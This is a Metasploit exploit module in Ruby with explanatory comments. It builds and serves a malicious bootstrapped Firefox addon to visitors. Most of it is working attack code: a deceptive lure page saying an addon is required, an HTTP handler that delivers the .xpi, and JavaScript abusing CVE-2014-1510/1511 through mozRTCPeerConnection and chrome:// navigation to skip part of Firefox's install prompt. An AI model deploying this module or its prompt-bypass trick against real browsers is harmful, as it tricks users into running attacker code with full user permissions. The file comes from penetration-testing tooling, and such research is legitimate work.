##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rex/zip'
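class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  # Registers the module metadata. The .xpi itself is built by the
  # FirefoxAddonGenerator mixin (generate_addon_xpi); this module only serves it
  # over HTTP and supplies the landing page that gets the browser to fetch it.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
      'Description' => %q{
        This exploit dynamically creates a .xpi addon file.
        The resulting bootstrapped Firefox addon is presented to
        the victim via a web page. The victim's Firefox browser
        will pop a dialog asking if they trust the addon.

        Once the user clicks "install", the addon is installed and
        executes the payload with full user permissions. As of Firefox
        4, this will work without a restart as the addon is marked to
        be "bootstrapped". As the addon will execute the payload after
        each Firefox restart, an option can be given to automatically
        uninstall the addon once the payload has been executed.

        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
        first half of the permissions prompt.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [ 'mihi', 'joev' ],
      'References'  =>
        [
          [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
          [ 'CVE', '2014-1511' ]
        ],
      'DisclosureDate' => 'Jun 27 2007'
    ))
  end

  # HTTP handler for every request that reaches this module's resource.
  #
  # Three request shapes are distinguished:
  #   * ".../addon.xpi" -> build a fresh addon for this client and serve it
  #   * ".../"          -> serve the landing page (generate_html)
  #   * anything else   -> redirect to the directory-form URL so the page's
  #                        relative "addon.xpi" href resolves under our resource
  #
  # Regexes are anchored with \z rather than $ so a URI with a trailing
  # newline cannot satisfy the ".xpi" or "/" checks.
  #
  # @param cli the connected client socket, passed through to the send_* helpers
  # @param request [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, request)
    # to_s keeps a nil URI from raising; it simply falls into the redirect branch.
    uri = request.uri.to_s

    if uri =~ /\.xpi\z/i
      # The browser followed the addon link (or the chrome:// trick opened it).
      print_status("Sending xpi and waiting for user to click 'accept'...")
      xpi = generate_addon_xpi(cli)
      if xpi
        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
      else
        # Payload generation failed for this client; answer 404 rather than
        # leaking an error page.
        print_error("Failed to generate the payload.")
        send_not_found(cli)
      end
    elsif uri.end_with?('/')
      # Directory-form URL: the victim has landed on the page.
      print_status("Sending response HTML." )
      send_response_html(cli, generate_html)
    else
      # Initial hit on the bare resource path. Force a trailing slash so the
      # relative href "addon.xpi" in generate_html resolves beneath
      # get_resource instead of alongside it.
      print_status("Redirecting request." )
      send_redirect(cli, "#{get_resource}/")
    end

    handler(cli)
  end

  # Builds the landing page.
  #
  # The visible "[Install]" link and the install() function are the plain
  # social-engineering path: navigating to addon.xpi triggers Firefox's normal
  # addon install prompt. The hidden iframe named 'f' is the target that
  # web_idl_navigation opens chrome://browser/content/browser.xul into on
  # vulnerable builds.
  #
  # @return [String] the HTML document
  def generate_html
    %Q|
      <html><head><title>Loading, Please Wait...</title></head>
      <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
      <div style='visibility:hidden;width:1px;height:1px;'>
        <iframe name='f'></iframe>
      </div>
      <script>
        function install() {
          window.location.href="addon.xpi";
        }
        #{web_idl_navigation}
      </script>
      </body>
      </html>
    |
  end

  # JavaScript for the CVE-2014-1510 / CVE-2014-1511 prompt-skipping path.
  #
  # On affected Firefox builds (the module description says 22.0 - 27.0; the
  # original comment here said 21 - 27 -- TODO confirm the lower bound, which
  # presumably tracks mozRTCPeerConnection availability), running window.open
  # from a mozRTCPeerConnection createOffer error callback is allowed to
  # navigate to a chrome:// URL. The iframe 'f' is loaded with browser.xul, and
  # after a 600ms delay (presumably to let the XUL finish loading) a nested
  # frame inside it is pointed at a data: URL that repeats the trick to open
  # our addon.xpi with '_self'. Per the original author's note this skips the
  # first permission prompt; the second (install confirmation) still appears.
  #
  # Every failure path -- no mozRTCPeerConnection, navigation blocked, the
  # nested frame missing -- falls back to install(), i.e. the ordinary prompt.
  # get_uri is operator-controlled and interpolated into a JS string literal,
  # so a URI containing a single quote would break the script (not a security
  # issue, but a usability one).
  #
  # @return [String] script body to embed in generate_html
  def web_idl_navigation
    %Q|
      try {
        c = new mozRTCPeerConnection;
        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
        setTimeout(function(){
          try {
            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
            "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
          } catch(e) {
            install();
          }
        },600);
      } catch(e) {
        install();
      }
    |
  end
end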